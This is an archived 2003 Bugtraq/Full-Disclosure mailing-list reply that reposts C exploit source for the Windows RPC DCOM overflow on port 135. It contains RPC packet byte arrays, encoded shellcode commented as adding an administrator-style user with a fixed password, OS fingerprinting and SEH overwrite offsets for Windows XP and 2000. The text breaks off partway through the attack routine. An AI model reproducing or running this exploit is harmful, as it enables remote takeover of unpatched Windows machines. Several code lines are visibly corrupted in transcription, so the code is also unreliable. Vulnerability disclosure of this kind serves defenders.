lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20031010210631.GA4258@phxby.com>
Date: Fri, 10 Oct 2003 15:06:31 -0600
From: Irwan Hadi <irwanhadi@...by.com>
To: "Brown, Bobby (US - Hermitage)" <bobbrown@...oitte.com>
Cc: "'Alex'" <pk95@...dex.ru>, bugtraq@...urityfocus.com,
   full-disclosure@...ts.netsys.com, NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM,
   Secure@...rosoft.com
Subject: Re: Re: Bad news on RPC DCOM vulnerability


On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:

> For us that can not interpret the site, what more information can be
> provided.

I believe if you use babelfish.altavista.com, you'll come to:
http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=0&TPN=3

The code itself is:

#include <stdio.h> 
#include <winsock2.h> 
#include <windows.h> 
#include <process.h> 
#include <string.h> 
#include <winbase.h> 

FILE *fp1; 
unsigned char bindstr[]={ 
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 

unsigned char request1[]={ 
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00}; 

unsigned char request2[]={ 
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x5C,0x00,0x5C,0x00}; 

unsigned char request3[]={ 
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 


unsigned char request4[]={ 
0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
}; 
void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) 
{ 
     for(int i=offset;i<(offset+lenght);i++) 
          buf=buf^mask; 
} 
DWORD GETSTRCS(char *buf) 
{ 
     DWORD cs=0; 
     bool cld=false; 
     for(unsigned int i=0;i<strlen(buf);i++) 
     { 
          for(int z=0;z<13;z++) 
          { 
          if(cs&1) cld=true; 
          cs=cs>>1; 
          if(cld) cs=cs|0x80000000; 
          cld=false; 
          } 
          cs+=buf; 
     } 
     return cs; 
} 

struct { 
     DWORD seh; 
     DWORD jmp; 
     DWORD heap; 
     char target[200]; 
} target_os[]= 
{ 
     { 
          0x005Bfd2c, 
          0x00081eeb, 
          0x00180000, 
          "WinXP" 
     }, 
     { 
          0x0095fd3c, 
          0x00081eeb, 
          0x00170000, 
          "Win2K" 
     } 
},v; 
unsigned char rawData1[]= 
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" 
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" 

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" 
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" 
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" 
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"     

//SHELLCODE From SAM ,THANKs ! 
//Add user SST,password is 557, 
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" 
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" 
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" 
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" 
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" 
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" 
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" 
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" 
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" 
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" 
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" 
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" 
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" 
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" 
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" 
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" 
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" 
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" 
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" 
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" 
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" 

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" 
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" 
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" 
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" 
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" 
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" 
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90"     // 
    "\x90\x90\x90\x90\x90\x90\x90\x90" 
    "\x77\xe0\x43\x00\x00\x10\x5c\x00" 
    "\xeb\x1e\x01\x00"//     FOR CN SP3/SP4+-MS03-26 
    "\x4C\x14\xec\x77"//    TOP SEH FOR cn w2k+SP4,must modify to SEH of
your target's os 


//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my
//artic 
//"Utilization of released heap structure and exploit of universal Heap
//overflow in windows ". 
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" 
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" 
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" 
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" 
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" 
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" 
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" 
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" 
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" 
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" 
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" 
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" 
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" 
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" 
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" 
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" 
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" 
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" 
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" 
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" 
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" 
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" 
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" 
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" 
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" 
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" 

"\x04\x04\x00\x70\x00\x04\x40" 
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" 

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; 


int version(char ip[16], int sock) 
{ 
//un poco de ettercap... 


unsigned char peer0_0[] = { 
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00 }; 


unsigned char peer0_1[] = { 
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x07, 0x00 }; 

/* 

unsigned char win2kvuln[] = { 
0x04, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00}; 
*/ 
     fd_set fds2; 
     unsigned char buf[1024]; 

     int l; 
     struct timeval tv2; 
     FD_ZERO(&fds2); 
     FD_SET(sock, &fds2); 
     tv2.tv_sec = 6; 
     tv2.tv_usec = 0; 

     memset(buf,'\0',sizeof(buf)); 
     send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
     if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
     { 
          l=recv (sock, (char *)buf, sizeof (buf),0); 
//          for(i=0;i<52;i++) 
//          { 
//               if (i==28)     i=i+4; 
//               if (buf[i+32]!=win2kvuln) 
//               { 
                    send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
                    if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
                    { 
                         memset(buf,'\0',sizeof(buf)); 
                         l=recv (sock, (char *)buf, sizeof (buf),0); 
                         if (l==32) 
                         { 
                              closesocket(sock); 
                              return(1);//winxp 
                         } 
                         else 
                         { 
                          #ifdef WIN32 
                          closesocket(sock); 
                          #else 
                          close(sock); 
                          #endif 
                          return(0);//win2kby default. Nt4 not added.. 
                         } 
                    } 
                    else return(-1); 
//               } 


          //} 
//          closesocket(sock); 
//          return(0);//win2k 
     } 
     closesocket(sock); 
     return(-1);          //Unknown 
} 
/********************************************************************************/ 
int attack(char *ip1,bool atack) 
{ 
     unsigned char rawData[1036]; 
     memcpy(rawData,rawData1,1036); 
     unsigned char shellcode[50000]; 
     char ip[200]; 
     strcpy(ip,ip1); 
    WSADATA WSAData; 
    SOCKET sock; 
    int len,len1; 
    SOCKADDR_IN addr_in; 
    short port=135; 
    unsigned char buf1[50000]; 
    unsigned char buf2[50000]; 

     printf("%s\n",ip); 
    //printf("RPC DCOM overflow Vulnerability discoveried by
    //NSFOCUS\n"); 
    //printf("Code by FlashSky,Flashsky xfocus org\n"); 
    //printf("Welcome to our Site: http://www.xfocus.org\n"); 
    //printf("Welcome to our Site: http://www.venustech.com.cn\n"); 
/*    if(argc!=3) 
    { 
          printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
          for(int i=0;i<sizeof(target_os)/sizeof(v);i++) 
               printf("%d - %s\n",i,target_os.target); 
               printf("\n%x\n",GETSTRCS(argv[1])); 
          return; 
    } 
*/ 
/*    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 
    { 
        printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 
        return; 
    } 
*/ 
    addr_in.sin_family=AF_INET; 
    addr_in.sin_port=htons(port); 
    addr_in.sin_addr.S_un.S_addr=inet_addr(ip); 
     
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 
    { 
        printf("Socket failed.Error:%d\n",WSAGetLastError()); 
        return 0; 
    } 
    len1=sizeof(request1); 

    len=sizeof(rawData); 

    if(WSAConnect(sock,(struct sockaddr
*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 
    { 
        printf("%s - connect failed\n",ip); 
        return 0; 
    } 

     int vers=!version(ip,sock); 

//     printf("%d\n",vers); 
//     return; 
//     int vers=1; 

     FILE *fp; 

     //...... ..... 
//     fp=fopen("shellcode","rb"); 
//     fread(rawData,1,1036,fp); 
//     fclose(fp); 
     //...... ..... ........ ............... ........... .......! 

     fp=fopen("bshell2","rb"); 
     int sz=fread(shellcode,1,1024,fp); 
     fclose(fp); 
//     printf("%d\n",sz); 
     for(int i=0;i<sz;i++) 
          rawData[i+0x71]=shellcode; 
//     fp=fopen("badfile.exe","rb"); 
//     unsigned int sz1=fread(shellcode,1,50000,fp); 
//     fclose(fp); 
//     for(i=0;i<sz1;i++) 
//          rawData[i+0x240]=shellcode; 

//     fp=fopen("pac","wb"); 
//     fwrite(rawData,1,1036,fp); 
//     fclose(fp); 

//     return; 

     
     //..... ... ... ....... ....... ..... .......... HEAP'a 
//     DWORD heap=0x00180000; 
//     int k=vers; 
//     vers=1; 
//     *(DWORD *)(rawData+0xae)=target_os[vers].heap; 
     *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; 
     //...... ..... .......... ... ..., ... .... ..... ........ ......
     //... ....., ... ..... ...... . ........ ........, .......
     //.......... ...., . ........ ...... 
     XOR(rawData,0x71,sz,0x99); 
//     XOR(rawData,0x240,sz1,0x99); 
     //... .. ... ..... ........ ...... ... SEH . JMP 
     DWORD seh=target_os[vers].seh; 
     DWORD jmp=target_os[vers].jmp; 
     *(DWORD *)(rawData+0x22a)=jmp; 
     *(DWORD *)(rawData+0x22e)=seh; 
//     *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); 
     *(WORD *)(rawData+0x62)=sz; 


     memcpy(buf2,request1,sizeof(request1)); 
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; 
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; 
    memcpy(buf2+len1,request2,sizeof(request2)); 
    len1=len1+sizeof(request2); 

    memcpy(buf2+len1,rawData,sizeof(rawData)); 
    len1=len1+sizeof(rawData); 

    memcpy(buf2+len1,request3,sizeof(request3)); 
    len1=len1+sizeof(request3); 
    memcpy(buf2+len1,request4,sizeof(request4)); 
    len1=len1+sizeof(request4); 
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; 

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; 
